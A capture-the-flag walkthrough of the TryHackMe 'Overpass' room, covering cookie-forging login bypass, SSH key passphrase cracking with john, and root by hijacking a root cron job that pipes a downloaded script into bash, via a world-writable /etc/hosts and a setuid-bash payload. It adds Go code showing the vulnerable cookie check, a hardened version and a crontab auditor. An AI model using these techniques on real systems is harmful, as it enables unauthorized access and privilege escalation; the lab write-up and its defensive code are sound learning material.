TryHackMe Room: https://tryhackme.com/room/overpass
New Day, New Room. Today we are attempting the OverPass room.
I boot up my AttackBox and the target machine; the machine in question is 10.10.224.184.
First, I do a preliminary nmap scan:
root@ip-x-x-x-x:~# nmap -sV 10.10.224.184
Starting Nmap 7.60 ( https://nmap.org ) at 2021-07-09 15:57 BST
Nmap scan report for ip-10-10-224-184.eu-west-1.compute.internal (10.10.224.184)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
MAC Address: 02:D2:A2:85:F6:47 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds
We can see we have a way in for SSH access on port 22, and we also have a webserver running on port 80. I browse around the website but do not really see anything too interesting. There are some downloads and source code for a password-to-file application. Next, let’s fire up gobuster to see if we have any common directories:
root@ip-x-x-x-x:~# gobuster dir --wordlist /usr/share/wordlists/dirb/common.txt -u 10.10.224.184
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url: http://10.10.224.184
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2021/07/09 15:55:52 Starting gobuster
/aboutus (Status: 301)
/admin (Status: 301)
/css (Status: 301)
/downloads (Status: 301)
/img (Status: 301)
/index.html (Status: 301)
2021/07/09 15:55:53 Finished
The admin directory is of interest. Let's check that out!
We are greeted with an admin login page. I checked the source code to see if there were any comments left in the code but did not see anything. One interesting file on this page is login.js. It shows us that the form submits to /api/login and that the response, statusOrCookie, is either the string "Incorrect credentials" or a token that is stored client-side with Cookies.set("SessionToken", statusOrCookie). This looks like a promising attack vector: the client just stores whatever the server hands back, so what matters is how the server validates that cookie on later requests.
Another possible route may be SQL injection. I am going to test a common set of credentials like admin:password123 and see if that gives us anything, then try some SQL injection. If all else fails, I want to check whether we can just set our own SessionToken and grant ourselves access.
SQL injection did not work, but setting a SessionToken cookie ourselves and refreshing (so the browser sends the cookie with the request) did work! The server evidently checks only that the cookie is present, not that its value is a token it issued. The admin page provides us with an SSH private key for 'James' and also mentions that it is crackable. First I am just going to copy the contents and see if we can log in with the key alone.
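The flaw behind that bypass, as an added example (my code, not the Overpass project's source): a Go handler that only tests for the presence of a SessionToken cookie, next to one that looks the cookie value up in a server-side session store and rejects anything the server never issued. The handler names, the in-memory store and the token format are assumptions for illustration; the real server's internals are not shown on this page.

```go
package main

import (
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"net/http"
	"net/http/httptest"
	"sync"
)

// sessions is an assumed server-side store of tokens the login handler issued.
// Only the hardened handler consults it.
var sessions = struct {
	sync.Mutex
	m map[string]string // token -> username
}{m: map[string]string{}}

// issueToken mints a random token and records it, the way a login handler
// would after a successful credential check.
func issueToken(user string) string {
	b := make([]byte, 16)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	tok := hex.EncodeToString(b)
	sessions.Lock()
	sessions.m[tok] = user
	sessions.Unlock()
	return tok
}

// vulnerableAdmin reproduces the flaw: the only check is that a SessionToken
// cookie exists. Its value is never compared with anything.
func vulnerableAdmin(w http.ResponseWriter, r *http.Request) {
	if _, err := r.Cookie("SessionToken"); err != nil {
		http.Error(w, "login required", http.StatusUnauthorized)
		return
	}
	fmt.Fprint(w, "admin page")
}

// hardenedAdmin looks the cookie value up in the session store and rejects
// anything the server did not issue.
func hardenedAdmin(w http.ResponseWriter, r *http.Request) {
	c, err := r.Cookie("SessionToken")
	if err != nil {
		http.Error(w, "login required", http.StatusUnauthorized)
		return
	}
	sessions.Lock()
	user, ok := sessions.m[c.Value]
	sessions.Unlock()
	if !ok {
		http.Error(w, "invalid session", http.StatusUnauthorized)
		return
	}
	fmt.Fprintf(w, "admin page for %s", user)
}

// requestWithCookie drives a handler with an optional SessionToken cookie and
// returns the HTTP status it produced. An empty token means no cookie at all.
func requestWithCookie(h http.HandlerFunc, token string) int {
	req := httptest.NewRequest(http.MethodGet, "/admin", nil)
	if token != "" {
		req.AddCookie(&http.Cookie{Name: "SessionToken", Value: token})
	}
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Code
}

func main() {
	forged := "anything" // what an attacker types into the browser's cookie jar
	issued := issueToken("admin")
	fmt.Println("vulnerable, forged cookie:", requestWithCookie(vulnerableAdmin, forged))
	fmt.Println("hardened, forged cookie:  ", requestWithCookie(hardenedAdmin, forged))
	fmt.Println("hardened, issued cookie:  ", requestWithCookie(hardenedAdmin, issued))
}
```

The first call returns 200 for a cookie the server never created, which is exactly what happened in the browser here; the hardened handler answers 401 to the same request and 200 only to a token that came out of issueToken.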
I copied the key to ~/.ssh/id_rsa, did a chmod 400 ~/.ssh/id_rsa to set permissions to read-only for us, and finally ran ssh -i ~/.ssh/id_rsa 10.10.224.184 to attempt to log in.
And crud: the key asks for a passphrase. Looks like we will be cracking the passphrase after all. First we need to convert the key to a hash using ssh2john.py, which I don't know the location of, so find + grep will help me out:
root@ip-x-x-x-x:/usr/bin# locate "ssh2john.py"
/opt/john/ssh2john.py
Now we just run python /opt/john/ssh2john.py ~/.ssh/id_rsa > id_rsa.hash to get the hash file.
Next I did a locate rockyou to find the wordlist, and we can use the hash file with that wordlist to crack the passphrase (the wordlist has to be passed with --wordlist=; given as a bare argument, john would try to load rockyou.txt as another hash file):
root@ip-x-x-x-x:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash
Within a few seconds we get the passphrase! Now let's ssh back in to james' account:
ssh -i ~/.ssh/id_rsa james@10.10.224.184
and we can cat user.txt for the first flag.
Now we need to privesc to get root permissions.
First, I try running sudo -l to see what commands we can run with sudo; however, it immediately asks for a password that we do not know.
I am going to grab a copy of LinEnum.sh, get it onto the machine, and run it to see what we have to work with:
# First, fetch the script on the attack machine
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# Next, start a web server in that directory to transfer the file
python3 -m http.server 3333
# Now, on the target machine, grab the file (plain http: http.server does not speak TLS)
wget http://attack-machine-ip:3333/LinEnum.sh
# Make it executable
chmod +x LinEnum.sh
# Save the results
./LinEnum.sh > results.txt
# and page through them
more results.txt
I'm parsing through the results and these items stand out:
- Two admin users: syslog and tryhackme
- Super user account: root
- The home directory of tryhackme is set to allow only that user to read from it (whereas our home directory is readable by all)
- The crontab executes curl overpass.thm/downloads/src/buildscript.sh | bash as root every minute. This is our way in.
- I ran cat /etc/hosts and see that overpass.thm just points back to localhost, which means the file is served from this machine. It seems like the files might be in the /root or /tryhackme folders, so we cannot get to those yet.
I went back a little and checked the permissions of the hosts file with ls -la /etc/hosts, and it shows that everyone is able to read and write to hosts!! Because the cron job resolves overpass.thm through /etc/hosts before fetching the script, we can point that name at our own machine, serve a file at the path /downloads/src/buildscript.sh, and have root execute whatever we put in it. The easiest payload is chmod +s /bin/bash, so that once the job has run we can start bash with the setuid bit and get root privileges.
So that's exactly what I did! I started a python web server with python3 -m http.server 80 in a directory that had the folder structure downloads/src/buildscript.sh. Then I modified /etc/hosts on the target machine to point overpass.thm to my attack machine's IP. After a minute, I saw the request come in and it grabbed the file!
Now I just needed to run /bin/bash -p (the -p flag keeps the effective uid granted by the setuid bit instead of dropping it), then whoami reported root!
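An added audit check for the two conditions that made this privilege escalation possible, written by me rather than taken from the room or from LinEnum: a cron job that pipes a downloaded script into a shell, and a world-writable hosts file that lets any local user decide where that download goes. The crontab text and the stand-in hosts file are constructed sample input; the /etc/crontab column layout (five time fields, a user field, then the command) and the regular expression are my assumptions.

```go
package main

import (
	"fmt"
	"os"
	"regexp"
	"strings"
)

// Finding is one cron job that pipes a downloaded script straight into a shell.
type Finding struct {
	User          string // account the job runs as (field 6 of /etc/crontab)
	Host          string // host the script is fetched from
	HostsWritable bool   // whether the hosts file can be edited by any local user
	Line          string // the offending crontab line
}

// pipeToShell matches "curl <url> | bash" and "wget ... <url> | sh" commands and
// captures the hostname from the URL. Go's leftmost-first matching consumes an
// explicit http:// or https:// prefix before the host is captured.
var pipeToShell = regexp.MustCompile(
	`(?:curl|wget)\b[^|]*?(?:https?://)?([A-Za-z0-9.-]+)[^\s|]*\s*\|\s*(?:sudo\s+)?(?:ba)?sh\b`)

// auditCrontab scans text in /etc/crontab format and reports every
// pipe-to-shell job together with whether hostsPath is world-writable, which is
// what lets a low-privileged user redirect the download host.
func auditCrontab(crontab, hostsPath string) ([]Finding, error) {
	info, err := os.Stat(hostsPath)
	if err != nil {
		return nil, err
	}
	worldWritable := info.Mode().Perm()&0o002 != 0

	var findings []Finding
	for _, line := range strings.Split(crontab, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		m := pipeToShell.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		user := "?"
		if f := strings.Fields(line); len(f) >= 7 {
			user = f[5]
		}
		findings = append(findings, Finding{User: user, Host: m[1], HostsWritable: worldWritable, Line: line})
	}
	return findings, nil
}

func main() {
	// Constructed sample modelled on the job LinEnum surfaced on the target.
	crontab := `# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
`
	// Stand-in for /etc/hosts so the example runs without touching the system.
	f, err := os.CreateTemp("", "hosts")
	if err != nil {
		panic(err)
	}
	defer os.Remove(f.Name())
	f.WriteString("127.0.0.1 localhost\n127.0.0.1 overpass.thm\n")
	f.Chmod(0o666) // the misconfiguration: world-writable hosts file
	f.Close()

	findings, err := auditCrontab(crontab, f.Name())
	if err != nil {
		panic(err)
	}
	for _, fd := range findings {
		fmt.Printf("user=%s host=%s hosts-world-writable=%v\n  %s\n",
			fd.User, fd.Host, fd.HostsWritable, fd.Line)
	}
}
```

A finding with HostsWritable set is the exact situation on this box: the job runs as root, the script comes from a name under local control, and rewriting one line in /etc/hosts is enough to swap in an attacker-served buildscript.sh. Either fixing the hosts file mode or replacing the curl-pipe-bash job with a locally installed, root-owned script breaks the chain.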
cat /root/root.txt gives us the final flag.